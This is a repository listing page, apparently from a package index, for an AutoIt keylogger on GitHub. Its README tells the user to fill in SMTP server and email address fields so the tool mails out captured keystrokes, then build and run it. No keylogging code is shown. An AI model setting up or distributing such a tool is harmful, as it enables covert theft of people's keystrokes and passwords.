https://github.com/baorv/keylogger
Keylogger wrote by AutoIT
https://github.com/baorv/keylogger
autoit baorv keylogger
Last synced: 11 months ago
JSON representation
Keylogger wrote by AutoIT
- Host: GitHub
- URL: https://github.com/baorv/keylogger
- Owner: baorv
- Created: 2016-05-12T15:24:59.000Z (about 10 years ago)
- Default Branch: master
- Last Pushed: 2018-04-03T13:19:28.000Z (about 8 years ago)
- Last Synced: 2025-02-09T12:27:47.876Z (over 1 year ago)
- Topics: autoit, baorv, keylogger
- Language: AutoIt
- Homepage:
- Size: 2.93 KB
- Stars: 9
- Watchers: 1
- Forks: 5
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# AutoIT keylogger
Keylogger wrote in AutoIT
## Installation
Open [keylogger.au3](keylogger.au3) and edit content of file
```au3
$SmtpServer = ""
$FromName = ""
$FromAddress = ""
$ToAddress = ""
$Subject = ""
$Body = ""
```
## Run
Just build and run